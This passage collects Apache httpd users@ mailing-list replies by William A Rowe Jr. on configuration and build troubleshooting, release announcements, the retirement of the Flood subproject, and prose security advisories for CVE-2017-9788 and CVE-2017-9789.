That is straightforward, your *client*, not httpd, has been sending bad
requests. Those might have CR or LF line endings, but failed to send
both CR+LF as required by the spec. It might be sending a badly
formatted request line, or invalid request header lines. LogLevel debug
here would be your friend, or you can use wireshark to look at a request.

'HttpProtocolOptions unsafe' config option can allow some of this very
unwise traffic to pass, but fixing the client is the correct solution.

Re: [users@httpd] APR Table vs. Hash & Array vs. Skip List vs. Ring

[William A Rowe Jr]

On Sun, May 27, 2018 at 10:00 PM, Simon Walter  wrote:

> On 05/27/2018 05:49 PM, Nick Kew wrote:
> >> On 27 May 2018, at 03:40, Simon Walter  wrote:
> >>
> >> Hi everyone,
> >>
> >> First of all, I am not sure if this is the right place to ask this.
> >> Please send me to the appropriate mailing list. Thanks.
> >
> > What's the context?  Given where you asked, I'll guess you're writing
> > a module for your web server, in which case, there's a modules-dev list
> > for the next question.
>
> Thanks. Maybe I will ask there next time. Though, no I am not writing a
> module.
>

Note that the apr project doesn't distinguish devs from users (same set),
much like openssl closed their dev list because all users are devs.

Feel free to ask dev@apr.a.o if you have a 'usage' question, because the
project considers all of these to be part of developing a useful library.

Cheers,

Bill

Re: [users@httpd] Apache as a Mutual SSL enabled Forward Proxy

[William A Rowe Jr]

Your next thing to test, from a vanilla/completely reset browser, would be
to load up these corresponding cert+key and ca chain files into that blank
slate, and ensure that these credentials actually work against your backend;

*  SSLProxyMachineCertificateFile
D:\sys-projects\aaa\Apache24\Apache24\security\key-client.pem*
*  SSLProxyCACertificateFile
D:\sys-projects\aaa\Apache24\Apache24\security\server.pem*

Also drop your proxy server's log level to debug and discover what it has
to say.

On Thu, May 24, 2018 at 2:42 AM, eranda rajapaksha 
wrote:

> Hi all,
>
> Im trying to configure Apache http server as a forward proxy with mutual
> ssl enabled. Following is the setup,
>
> [HTTP client] --> [Apache Http Server]--->[Web Server]
>
> I need to enable Mutual SSL between  Apache Http Server, Web Server.
> Following is the proxy I have configured. It works fine when connecting
> other internet web servers.
>
> *Listen 3128*
>
> **
> *  ProxyRequests On*
> *  SSLProxyEngine On*
> *  SSLVerifyClient require*
> *  SSLVerifyDepth  10*
>
> *  SSLProxyMachineCertificateFile
> D:\sys-projects\aaa\Apache24\Apache24\security\key-client.pem*
> *  SSLProxyCACertificateFile
> D:\sys-projects\aaa\Apache24\Apache24\security\server.pem*
>
> *  *
>
>
> I have tested connecting client directly to the Web server bypassing
> Apache Forward proxy and it works fine. But when it tries to connect
> through Apache server I'm getting following error on clients end,
>
> *java.io.IOException: Unable to tunnel through proxy. Proxy returns
> "HTTP/1.1 403 Proxy Error"*
>
> Even if I just enable one way SSL, the behavior is the same. Am I not
> importing the Server cert correctly into Apache? Or is there other
> configuration issue in my setup.
>
> Please help me on this.
>
>
> Thanks,
> --
> *Eranda Rajapakshe*
> Computer Science and Engineering Undergraduate,
> University of Moratuwa.
> Tel : +94784822608
> Email : erand...@gmail.com 
>

[users@httpd] [Appeal] zh Reviewers wanted (was: Attempting translating Chinese documentation)

[William A Rowe Jr]

On Sun, May 13, 2018 at 8:24 AM, CodeingBoy  wrote:

> Hello William, thanks for your information. I have completed the
> translation progress of error messages.
> I have translated these message to both Simplified Chinese(zh-cn) and
> Traditional Chinese(zh-tw). One thing should be noticed is that I'm not a
> native speaker of Traditional Chinese, for Taiwan people they might feel a
> little weird(though they can understand it).
> On the other hand, I did a lot checking to make sure translations contains
> little mistakes(if any). A reviewer would be helpful, but I didn't find
> one. :(
>

Thank you for your contribution and attention to detail! Committed to httpd
trunk in
http://svn.apache.org/viewvc?view=revision=1831800

If any conversant/native reader would kindly review either (or both) the
draft zh-cn and/or zh-tw error text, we can move on to backporting this
commit to 2.4.x for the next release. For the entire draft error page doc
set, please checkout;
http://svn.apache.org/repos/asf/httpd/httpd/trunk/docs/error/

Sharing with users@ to hopefully find a willing reviewer.

Again, thank you much!

Cheers,

Bill

ps: to any of you on users@ who might be interested, if you are willing to
review docs submissions in your native/fluent languages, please consider
subscribing to d...@httpd.apache.org to lend your aid. TIA!

[users@httpd] Re: [REQUEST] Httpd Webserver Training in French

[William A Rowe Jr]

Hi Sharan,

it's usually more efficient to ask the community directly about
project-specific
asks. I've gone ahead and forwarded your note to the users and dev lists
where we are more likely to find the right resources. I personally
know at least
a half dozen httpd committers proficient in French, so this seems in the realm
of possibility!

Potential presenters,

note contact info below to reach out.



On Thu, Jan 4, 2018 at 8:38 AM, Sharan Foga  wrote:
> Hi Everyone
>
> I've posted a message on the httpd dev mailng list too but am including it 
> here just in case we have someone that can do it!
>
> During the Open Source Summit in Paris, a company (starinux.org) came to the 
> Apache booth to ask us about getting some training on the httpd webserver for 
> their members. They are looking for one full day of training. The company is 
> French one so the training would need to be done in French too. The location 
> will be Paris, La Defense.
>
> If anyone is interested in providing some training for them then their 
> contact details are as follows:
>
> Antoine Wache
> cont...@starinux.org
>
> Thanks
> Sharan
>
>
>
> -
> To unsubscribe, e-mail: dev-unsubscr...@community.apache.org
> For additional commands, e-mail: dev-h...@community.apache.org
>

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Is httpd 2.4.x is supported on CentOs6?

[William A Rowe Jr]

According to my notes, that is 2.2.15.

As noted previously, turn to RH for support. The EOL was back in July and
we will stop making public comments or security advisories once we have
fewer than three active project members attending to this legacy version.



On Nov 28, 2017 06:47, "chetan jain"  wrote:

Hi All,

As apache 2.2.x is EOL, I need to upgrade to httpd 2.4.x version but I am
not able to verify anywhere if it is supported/tested configuration with
Centos 6 OS?

Any inputs are highly apprrleciated.

Thanks,
Chetan

Re: [users@httpd] RE: [ANNOUNCE] Apache HTTP Server 2.4.29 Released

[William A Rowe Jr]

Actually, that was in APR-util 1.6.1, see the APR release announcement
and Craig's
users@httpd post.



On Wed, Oct 25, 2017 at 4:02 PM, Craig Young  wrote:
> I’m not sure if this is what is referred to in the Apache 2.4.29 
> announcement, but please note that the Apache Portable Runtime v1.6.3 release 
> resolved memory safety issues I found in functions used within HTTP server.  
> This was released in conjunction with 2.4.29.
>
> Using HTTP server linked to prior versions of APR exposes the risks outlined 
> in my email sent to this list on Monday.
>
> Best Regards,
> Craig
>
> On 10/25/17, 1:05 PM, "Development Manager" 
>  wrote:
>
> The 2.4.29 changes document doesn't reference any CVE articles, though 
> the announcement indicates that this is a security release. Are any of the 
> 2.4.29 changes security related?
>
> Thanks,
> Jim
>
> -
> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
> For additional commands, e-mail: users-h...@httpd.apache.org
>
>
>

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] [ANNOUNCE] Apache HTTP Server 2.4.29 Released

[William A Rowe Jr]

On Mon, Oct 23, 2017 at 11:53 AM, William A Rowe Jr <wr...@rowe-clan.net> wrote:
> On Mon, Oct 23, 2017 at 11:45 AM, Jim Jagielski <j...@jagunet.com> wrote:
>>  Apache HTTP Server 2.4.29 Released
>>
>> October 23, 2017
>>
>> The Apache Software Foundation and the Apache HTTP Server Project
>> are pleased to announce the release of version 2.4.29 of the Apache
>> HTTP Server ("Apache").  This version of Apache is our latest GA
>> release of the new generation 2.4.x branch of Apache HTTPD and
>> represents fifteen years of innovation by the project, and is
>> recommended over all previous releases. This release of Apache is
>> a security, feature, and bug fix release.
>>
>> We consider this release to be the best version of Apache available, and
>> encourage users of all prior versions to upgrade.
>>
>> Apache HTTP Server 2.4.29 is available for download from:
>>
>>   http://httpd.apache.org/download.cgi
>
> Broken link.

And... back in sync. Thanks for RM'ing!

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] [ANNOUNCE] Apache HTTP Server 2.4.29 Released

[William A Rowe Jr]

On Mon, Oct 23, 2017 at 11:45 AM, Jim Jagielski  wrote:
>  Apache HTTP Server 2.4.29 Released
>
> October 23, 2017
>
> The Apache Software Foundation and the Apache HTTP Server Project
> are pleased to announce the release of version 2.4.29 of the Apache
> HTTP Server ("Apache").  This version of Apache is our latest GA
> release of the new generation 2.4.x branch of Apache HTTPD and
> represents fifteen years of innovation by the project, and is
> recommended over all previous releases. This release of Apache is
> a security, feature, and bug fix release.
>
> We consider this release to be the best version of Apache available, and
> encourage users of all prior versions to upgrade.
>
> Apache HTTP Server 2.4.29 is available for download from:
>
>   http://httpd.apache.org/download.cgi

Broken link.

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

[users@httpd] Fwd: [Announcement] Apache HTTP Server 2.4.28 Released

[William A Rowe Jr]

For anyone not subscribed to announce@, sorry I hadn't passed this on...

-- Forwarded message --
From: "William A Rowe Jr" <wr...@apache.org>
Date: Oct 5, 2017 13:48
Subject: [Announcement] Apache HTTP Server 2.4.28 Released
To: <annou...@apache.org>
Cc:

 Apache HTTP Server 2.4.28 Released
>
> October 5, 2017
>
> The Apache Software Foundation and the Apache HTTP Server Project
> are pleased to announce the release of version 2.4.28 of the Apache
> HTTP Server ("Apache").  This version of Apache is our latest GA
> release of the new generation 2.4.x branch of Apache HTTPD and
> represents fifteen years of innovation by the project, and is
> recommended over all previous releases. This release of Apache is
> a security, feature, and bug fix release.
>
> We consider this release to be the best version of Apache available, and
> encourage users of all prior versions to upgrade.
>
> Apache HTTP Server 2.4.28 is available for download from:
>
>   http://httpd.apache.org/download.cgi
>
> Apache 2.4 offers numerous enhancements, improvements, and performance
> boosts over the 2.2 codebase.  For an overview of new features
> introduced since 2.4 please see:
>
>   http://httpd.apache.org/docs/trunk/new_features_2_4.html
>
> Please see the CHANGES_2.4 file, linked from the download page, for a
> full list of changes. A condensed list, CHANGES_2.4.28 includes only
> those changes introduced since the prior 2.4 release.  A summary of all
> of the security vulnerabilities addressed in this and earlier releases
> is available:
>
>   http://httpd.apache.org/security/vulnerabilities_24.html
>
> Of particular note in this release is 1 SECURITY item:
>
>   o SECURITY: CVE-2017-9798 (cve.mitre.org)
> Corrupted or freed memory access. <Limit[Except] > or the
> RegisterHttpMethod directive must be given in the startup
> configuration (httpd.conf) to register non-standard HTTP methods
> before listing them in an .htaccess files.
>
> This release requires the Apache Portable Runtime (APR), minimum
> version 1.5.x, and APR-Util, minimum version 1.5.x. Some features may
> require the 1.6.x version of both APR and APR-Util. The APR libraries
> must be upgraded for all features of httpd to operate correctly.
>
> This release builds on and extends the Apache 2.2 API.  Modules written
> for Apache 2.2 will need to be recompiled in order to run with Apache
> 2.4, and require minimal or no source code changes.
>
>   http://svn.apache.org/repos/asf/httpd/httpd/trunk/VERSIONING
>
> When upgrading or installing this version of Apache, please bear in mind
> that if you intend to use Apache with one of the threaded MPMs (other
> than the Prefork MPM), you must ensure that any modules you will be
> using (and the libraries they depend on) are thread-safe.
>
> Please note that while the Apache HTTP Server Project may publish some
> security patches to the 2.2.x flavor through at least December of 2017,
> no further maintenance patches of 2.2.x will be considered and no further
> releases will be distributed. The 2.2.x branch has now reached the end of
> its maintenance, and users are strongly encouraged to promptly complete
> their transitions to this 2.4.x flavor of httpd to benefit from security
> and bug fixes, as well as new features.
>
>

[users@httpd] Fwd: Flood 0.4 status? (was: flood 0.4 was never signed for?)

[William A Rowe Jr]

Copying users@ in case some of you are Flood subproject users,
please make your voices heard.

Thanks,

Bill


-- Forwarded message --
From: William A Rowe Jr <wr...@rowe-clan.net>
Date: Thu, Sep 14, 2017 at 10:48 AM
Subject: Re: Flood 0.4 status? (was: flood 0.4 was never signed for?)
To: httpd <d...@httpd.apache.org>


I know many of you had busy summers and August holidays... just want
to be sure that nobody who wanted to comment has missed discussion
of retiring the Flood subproject.

If we don't reach any other conclusion or interest, we should wind this down
next week in response to Daniel's concern from the Infra team.

The only remaining question is do we (httpd PMC) archive this, or do we
hand the baton off to the Attic for this legacy source code?




On Wed, Sep 6, 2017 at 12:25 AM, Luca Toscano <toscano.l...@gmail.com> wrote:
> Hi William,
>
> As far as I can see the project seems abandoned, so in my opinion unless
> somebody steps up to work on it I'd be in favor of remove it from
> www.a.o/dist/httpd/flood.
>
> Luca
>
>
> 2017-09-01 18:39 GMT+02:00 William A Rowe Jr <wr...@rowe-clan.net>:
>>
>> What's our position on this? Is it time to declare flood abandoned?
>>
>> Are there any users of this tool who want to contribute to maintaining it?
>>
>> Offhand, I expect it does not support TLS/SNI. Nor HTTP/2.
>>
>> If abandoned, we can simply remove www.a.o/dist/httpd/flood
>> to resolve Daniel's issue. If not abandoned, regenerating the
>> tarball from should result in the same file, which can then be
>> signed.
>>
>> Thoughts?
>>
>>
>>
>> On Sat, Aug 19, 2017 at 12:43 AM, Daniel Gruno <humbed...@apache.org>
>> wrote:
>> > Hi folks,
>> >
>> > It appears that flood 0.4 (
>> > https://dist.apache.org/repos/dist/release/httpd/flood/ ) was never
>> > signed by anyone, which should likely be fixed. As this was, AIUI,
>> > released 8 years ago, I cannot in good conscience sign for it myself.
>> >
>> > Either we have someone who was present back then sign for it, or we
>> > should remove the release, pursuant to our release policy.
>> >
>> > With regards,
>> > Daniel.
>
>

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

[users@httpd] Flood 0.4 status? (was: flood 0.4 was never signed for?)

[William A Rowe Jr]

What's our position on this? Is it time to declare flood abandoned?

Are there any users of this tool who want to contribute to maintaining it?

Offhand, I expect it does not support TLS/SNI. Nor HTTP/2.

If abandoned, we can simply remove www.a.o/dist/httpd/flood
to resolve Daniel's issue. If not abandoned, regenerating the
tarball from should result in the same file, which can then be
signed.

Thoughts?



On Sat, Aug 19, 2017 at 12:43 AM, Daniel Gruno  wrote:
> Hi folks,
>
> It appears that flood 0.4 (
> https://dist.apache.org/repos/dist/release/httpd/flood/ ) was never
> signed by anyone, which should likely be fixed. As this was, AIUI,
> released 8 years ago, I cannot in good conscience sign for it myself.
>
> Either we have someone who was present back then sign for it, or we
> should remove the release, pursuant to our release policy.
>
> With regards,
> Daniel.

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] How to use binary to run httpd in different location

[William A Rowe Jr]

On Wed, Aug 2, 2017 at 6:24 AM, Eric Covener  wrote:
> On Wed, Aug 2, 2017 at 5:21 AM, Hemant Chaudhary
>  wrote:
>> Hi
>>
>> I have ported apache on my machine. I have copied bin,lib.conf,modules,
>> htdocs,logs to another location. Now I want to run my apache in new location
>> with these things only.
>> I changed path in httpd.conig and apachectl of new location, but while
>> starting it is starting apache in old location.
>>
>> For example :
>> I ported apache on /home/hemant ..
>> I copied bin,conf,logs,htdocs,modules to /home/rakesh and in httpd.config I
>> replace all path of /home/hemant to /home/rakesh and changed port also. But
>> when I am starting apache, it is only starting at /home/hemant.
>
> pass -d  /home/rakesh/... to apachectl?

That would be the best case. It might also be necessary to flip the
LD_LIBRARY_PATH to point to the {httpd-dir}/lib directory so that all
of the linked libraries are loaded correctly.

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

[users@httpd] CVE-2017-9788: Uninitialized memory reflection in mod_auth_digest

[William A Rowe Jr]

CVE-2017-9788: Uninitialized memory reflection in mod_auth_digest

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
all versions through 2.2.33 and 2.4.26

Description:
The value placeholder in [Proxy-]Authorization headers
of type 'Digest' was not initialized or reset
before or between successive key=value assignments.
by mod_auth_digest
Providing an initial key with no '=' assignment
could reflect the stale value of uninitialized pool
memory used by the prior request, leading to leakage
of potentially confidential information, and a segfault

Mitigation:
All users of httpd should upgrade to 2.4.27 (or minimally
2.2.34, which will receive no further security releases.)
Alternately, the administrator could configure httpd to
reject requests with a header matching a complex regular
expression identifing where = character does not occur
in the first key=value pair, as in the following syntax;
[Proxy-]Authorization: Digest key[,key=value]

Credit:
The Apache HTTP Server security team would like to thank Robert Święcki
for reporting this issue.

References:
https://httpd.apache.org/security_report.html

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

[users@httpd] CVE-2017-9789: Read after free in mod_http2

[William A Rowe Jr]

CVE-2017-9789: Read after free in mod_http2

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
httpd 2.4.26

Description:
When under stress, closing many connections, the HTTP/2
handling code would sometimes access memory after it has
been freed, resulting in potentially erratic behaviour.

Mitigation:
2.4.26 users of mod_http2 should upgrade to 2.4.27.

Credit:
The Apache HTTP Server security team would like to thank Robert Święcki
for reporting this issue.

References:
https://httpd.apache.org/security_report.html

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] [ANNOUNCEMENT] Apache HTTP Server 2.4.27 Released

[William A Rowe Jr]

On Tue, Jul 11, 2017 at 9:13 AM, Hajo Locke  wrote:
>
> Am 11.07.2017 um 15:58 schrieb Eric Covener:
>>
>> On Tue, Jul 11, 2017 at 9:41 AM, David Copeland
>>  wrote:

 o HTTP/2 will not be negotiated when using the Prefork MPM
>>>
>>> I'm wondering what the reason for this is?
>>
>> In the previous release, HTTP2 made prefork run multi-threaded. People
>> often chose prefork due to non-threadsafe code running in the server.
>>
>>
> so we cant use http/2 in 2.4.27 when using mod_prefork? it is not
> configurable?

> We use mod_prefork because of mod_php.

Please also note, mod_php has been strongly discouraged for years.

The conventional advise is to configure the php fcgi sapi, using either
mod_proxy_fcgi with php fpm, or mod_fcgid, and a modest number of
single process php fcgi workers to serve requests, and either event or
worker MPM. This is still not spelled out well in the formal PHP docs
(but who reads docs?)

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

[users@httpd] [Announcement] Apache HTTP Server 2.2.34 Released

[William A Rowe Jr]

  July 11, 2017

   The Apache Software Foundation and the Apache HTTP Server Project
   announce the release of version 2.2.34 of the Apache HTTP Server
   ("Apache"), the final maintenance release of the 2.2 series. No
   further 2.2 releases are anticipated. This version of Apache is
   principally a security and bug fix maintenance release.

   We consider the current Apache HTTP Server 2.4 release to be the best
   version of Apache available, and encourage every user of 2.2 and all
   prior versions to upgrade. This final 2.2 release is offered for those
   unable to upgrade at this moment.

   Take note that Apache Web Server Project will provide no future release
   of the 2.2.x series, although some security patches may be published
   through December of 2017. These will be collected at the URL;

 http://www.apache.org/dist/httpd/patches/apply_to_2.2.34/

   No further maintenance patches of 2.2.x will be published. Users are
   strongly encouraged to promptly complete their transitions to the
   2.4.x flavor of httpd to receive any future benefit from the user
   community or the Apache HTTP Server project developers.

   For further details about the currently supported release, see:

 http://www.apache.org/dist/httpd/Announcement2.4.txt

   Apache HTTP Server 2.4 and 2.2.34 are available for download from:

 http://httpd.apache.org/download.cgi

   Please see the CHANGES_2.2 file, linked from the download page, for a
   full list of changes. A condensed list, CHANGES_2.2.34 includes only
   those changes introduced since the prior 2.2 release. A summary of all
   of the security vulnerabilities addressed in this and earlier releases
   is available:

 http://httpd.apache.org/security/vulnerabilities_22.html

   Note that the Apache HTTP Server project will discontinue evaluations
   and corresponding advisories to this resource effective January, 2018.

   This release includes the Apache Portable Runtime (APR) version 1.5.2
   and APR Utility Library (APR-util) version 1.5.4, bundled with the tar
   and zip distributions. The APR libraries libapr and libaprutil (and
   on Win32, libapriconv version 1.2.1) must all be updated to ensure
   binary compatibility and address many known security and platform bugs.
   APR version 1.5 and APR-util version 1.5 represent minor version upgrades
   from earlier httpd 2.2 source distributions.

   Note this package also includes very stale and known-vulnerable versions
   of the Expat [http://expat.sourceforge.net/] and PCRE [http://www.pcre.org/]
   packages. Users are strongly encouraged to first install the most recent
   versions of these components (of PCRE 8.x, not PCRE2 10.x at this time.)

   This release builds on and extends the Apache 2.0 API and is superceeded
   by the Apache 2.4 API. Modules written for Apache 2.2 will need to be
   recompiled in order to run with Apache 2.4, and most will require minimal
   or no source code changes.

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Problems building httpd-2.4.26 with apr-1.6.2 and apr-util-1.6.0

[William A Rowe Jr]

On Fri, Jun 23, 2017 at 11:22 AM, Eric Covener  wrote:
> On Fri, Jun 23, 2017 at 10:55 AM, Martin Knoblauch  wrote:
>>  Apparently apr-util no longer bundles "expat". So my question: what is the
>> correct/intended way to work around this?
>
>
> apr-util accepts a --with-expat.  If you build apr-util under httpd's
> srclib/ --with-expat can be specified at the top and it will be passed
> down.

Note this shouldn't be necessary once you've installed libexpat
(-dev / -devel depending on your OS conventions.)

Expat 2 is finally quite stable and with some luck you can rely
on your OS vendor to patch security defects. Once you've installed
the dev[el] package, apr should detect expat without hints.

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] if directive not being respected in Apache 2.4.6

[William A Rowe Jr]

On Wed, Jun 21, 2017 at 10:39 AM, Eric Covener  wrote:
> On Fri, Jun 9, 2017 at 12:36 PM, Day, Chuck  wrote:
>>Define locale1 fr-FR
>
> It is not currently documented or rejected, but "Define" can't be
> wrapped in any of the normal configuration sections (only ifdefine,
> ifmodule, etc. can wrap it)
> It is processed at startup only, not during request procesing.

Actually, it is documented, see last para;

http://httpd.apache.org/docs/2.4/mod/core.html#define

Frankly I'd think scope should be defined as Global only,
even though it won't error out in these other cases. For
trunk, it would be good to lock this down and eliminate
the legacy 'support' of Define in sections.

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

RE: [users@httpd] Building httpd2.4.25 on powerpc-ibm-aix7.1.0.0

[William A Rowe Jr]

You'll need to provision libuuid and rebuild apr[-util] - a required
prerequisite for httpd.

On May 31, 2017 2:25 PM, "Joseph, Anselm"  wrote:

> Thank you all for your replies.
>
> So I got back on the horse and installed latest APRs and PCRE, then ran
> configure again as follows:
>
> CC='gcc' CPP='gcc -E' ./configure --enable-so --enable-dav
> --prefix=/opt/eai/ci/httpd-2.4.25/apache 
> --with-iconv=/opt/eai/ci/libiconv-1.15/libiconv/lib
> --with
>
> -apr=/opt/eai/ci/httpd-2.4.25/srclib/apr 
> --with-apr-util=/opt/eai/ci/httpd-2.4.25/srclib/apr-util
> --with-pcre=/opt/eai/ci/httpd-2.4.25/srclib/pcre/pcre-config
>
>
>
> Config was clean, with a warning about OpenSSL being too old
>
> configure:37818: summary of build options:
>
>
>
> Server Version: 2.4.25
>
> Install prefix: /opt/eai/ci/httpd-2.4.25/apache
>
> C compiler: gcc -std=gnu99
>
> CFLAGS:   -O2 -pg -pthread
>
> LDFLAGS: -Wl,-brtl
>
> LIBS:
>
> CPPFLAGS:-U__STR__ -D_THREAD_SAFE -D_LARGEFILE64_SOURCE
>
> C preprocessor: gcc -E
>
>
>
> I tried 'make' and got the following *Undefined symbol: apr_os_uuid_get *
> Error:
>
> Target "local-all" is up to date.
>
> Target "all" is up to date.
>
> /opt/eai/ci/httpd-2.4.25/srclib/apr/build-1/libtool --silent
> --mode=compile gcc -std=gnu99  -O2 -pg -pthread  -U__STR__
> -D_THREAD_SAFE -D_LARGEFILE64_SOURCE -I. 
> -I/opt/eai/ci/httpd-2.4.25/os/unix
> -I/opt/eai/ci/httpd-2.4.25/include 
> -I/opt/eai/ci/httpd-2.4.25/srclib/apr/include/apr-1
> -I/opt/eai/ci/httpd-2.4.25/srclib/apr-util/include/apr-1
> -I/opt/eai/ci/httpd-2.4.25/srclib/pcre/include 
> -I/opt/eai/ci/httpd-2.4.25/modules/aaa
> -I/opt/eai/ci/httpd-2.4.25/modules/cache 
> -I/opt/eai/ci/httpd-2.4.25/modules/core
> -I/opt/eai/ci/httpd-2.4.25/modules/database 
> -I/opt/eai/ci/httpd-2.4.25/modules/filters
> -I/opt/eai/ci/httpd-2.4.25/modules/ldap 
> -I/opt/eai/ci/httpd-2.4.25/modules/loggers
> -I/opt/eai/ci/httpd-2.4.25/modules/lua 
> -I/opt/eai/ci/httpd-2.4.25/modules/proxy
> -I/opt/eai/ci/httpd-2.4.25/modules/session 
> -I/opt/eai/ci/httpd-2.4.25/modules/ssl
> -I/opt/eai/ci/httpd-2.4.25/modules/test -I/opt/eai/ci/httpd-2.4.25/server
> -I/opt/eai/ci/httpd-2.4.25/modules/arch/unix 
> -I/opt/eai/ci/httpd-2.4.25/modules/dav/main
> -I/opt/eai/ci/httpd-2.4.25/modules/generators 
> -I/opt/eai/ci/httpd-2.4.25/modules/mappers
> -prefer-non-pic -static -c modules.c && touch modules.lo
>
> gcc -std=gnu99  -O2 -pg -pthread  -U__STR__ -D_THREAD_SAFE
> -D_LARGEFILE64_SOURCE -I. -I/opt/eai/ci/httpd-2.4.25/os/unix
> -I/opt/eai/ci/httpd-2.4.25/include 
> -I/opt/eai/ci/httpd-2.4.25/srclib/apr/include/apr-1
> -I/opt/eai/ci/httpd-2.4.25/srclib/apr-util/include/apr-1
> -I/opt/eai/ci/httpd-2.4.25/srclib/pcre/include 
> -I/opt/eai/ci/httpd-2.4.25/modules/aaa
> -I/opt/eai/ci/httpd-2.4.25/modules/cache 
> -I/opt/eai/ci/httpd-2.4.25/modules/core
> -I/opt/eai/ci/httpd-2.4.25/modules/database 
> -I/opt/eai/ci/httpd-2.4.25/modules/filters
> -I/opt/eai/ci/httpd-2.4.25/modules/ldap 
> -I/opt/eai/ci/httpd-2.4.25/modules/loggers
> -I/opt/eai/ci/httpd-2.4.25/modules/lua 
> -I/opt/eai/ci/httpd-2.4.25/modules/proxy
> -I/opt/eai/ci/httpd-2.4.25/modules/session 
> -I/opt/eai/ci/httpd-2.4.25/modules/ssl
> -I/opt/eai/ci/httpd-2.4.25/modules/test -I/opt/eai/ci/httpd-2.4.25/server
> -I/opt/eai/ci/httpd-2.4.25/modules/arch/unix 
> -I/opt/eai/ci/httpd-2.4.25/modules/dav/main
> -I/opt/eai/ci/httpd-2.4.25/modules/generators 
> -I/opt/eai/ci/httpd-2.4.25/modules/mappers
> -c /opt/eai/ci/httpd-2.4.25/server/buildmark.c
>
> /opt/eai/ci/httpd-2.4.25/srclib/apr/build-1/libtool --silent
> --mode=link gcc -std=gnu99  -O2 -pg -pthread  -Wl,-brtl   -o httpd
> modules.lo buildmark.o -export-dynamic -Wl,-uXML_Parse
> -Wl,-bE:/opt/eai/ci/httpd-2.4.25/server/httpd.exp server/libmain.la
> modules/core/libmod_so.la modules/http/libmod_http.la  server/mpm/worker/
> libworker.la  os/unix/libos.la -L/opt/eai/ci/httpd-2.4.25/srclib/pcre/lib
> -lpcre/opt/eai/ci/httpd-2.4.25/srclib/apr-util/lib/libaprutil-1.la
> -lexpat -liconv /opt/eai/ci/httpd-2.4.25/srclib/apr/lib/libapr-1.la
> -lpthread
>
> ld: 0711-317 ERROR: Undefined symbol: apr_os_uuid_get
>
> ld: 0711-345 Use the -bloadmap or -bnoquiet option to obtain more
> information.
>
> collect2: ld returned 8 exit status
>
> make: 1254-004 The error code from the last command is 1.
>
> Any idea how to link to the right libraries?
>
> Thank you in advance.
>
> -Original Message-
> From: Jose R R [mailto:jose@metztli.com]
> Sent: Wednesday, May 24, 2017 7:24 PM
> To: users@httpd.apache.org
> Subject: Re: [users@httpd] Building httpd2.4.25 on powerpc-ibm-aix7.1.0.0
>
>
>
> CAUTION - EXTERNAL EMAIL
>
>
>
>
>
>
>
> Niltze [Hello]
>
>
>
> On Wed, May 24, 2017 at 8:08 AM, Joseph, Anselm 
> wrote:
>
> >
>
> > I have been trying to install/compile Apache Subversion 1.9.5 with
> HTTPD-2.2.32, and it’s been 

Re: [users@httpd] What is preferred PHP interface?

[William A Rowe Jr]

There is little activity on mod_fcgid because it works. There has been talk
of tagging 2.3.10 at some point for very minor fixes.

Mod_proxy_fcgi is a viable alternative, and offers the ability to load
balance, but managing the process pool of available fcgi workers is
offloaded from httpd and becomes a distinct ops responsibility. It too has
changed little since 2013.

Re: [users@httpd] Error nghttp2 version is too old

[William A Rowe Jr]

You really need to approach your package maintainer, I picked up
nghttp2 around that same point a year ago and never had an issue.

Anything to do with rpm installs is on the maintainer, and has nothing
to do with this project, sorry we can't be of more help.

On Sun, Mar 12, 2017 at 3:12 PM, John Iliffe  wrote:
> I am trying to compile Apache 2.4.25 on Fedora 25 Linux.
>
> The current version of nghttp2 is installed:
>
> -
> [John@prod04 httpd-2.4.25]$ rpm -qv nghttp2
> nghttp2-1.13.0-2.fc25.x86_64
> -
>
> -
> /usr/lib64/libnghttp2.so.14
> /usr/lib64/libnghttp2.so.14.9.0
> -
>
> To me, these would both seem to be greater than 1.2.1, but I am getting
> this error from configure:
>
> --
> checking for nghttp2... checking for user-provided nghttp2 base
> directory... none
> checking for pkg-config along ... checking for nghttp2 version >= 1.2.1...
> FAILED
> configure: WARNING: nghttp2 version is too old
> no
> checking whether to enable mod_http2... configure: error: mod_http2 has been
> requested but can not be built due to prerequisite failures
> 
>
> These are the currently available versions from the Fedora repository.
>
> Has anyone any suggestions as to why this might be occurring?
>
> Thanks in advance.
>
> John
> ===
>
> -
> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
> For additional commands, e-mail: users-h...@httpd.apache.org
>

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] URG:DocumentRoot relate query on WIndows

[William A Rowe Jr]

What you are seeing is correct behavior, DocumentRoot is an absolute
path, whether you have specified this or not. If httpd sees an incomplete
path, it is going to work out an absolute path from the ServerRoot If it
appends the default and cannot establish a full path, you will receive
the indicated error.

It seems your ServerRoot/config is equally problematic, if httpd.conf
exists in the root of a system volume. There should be nothing that
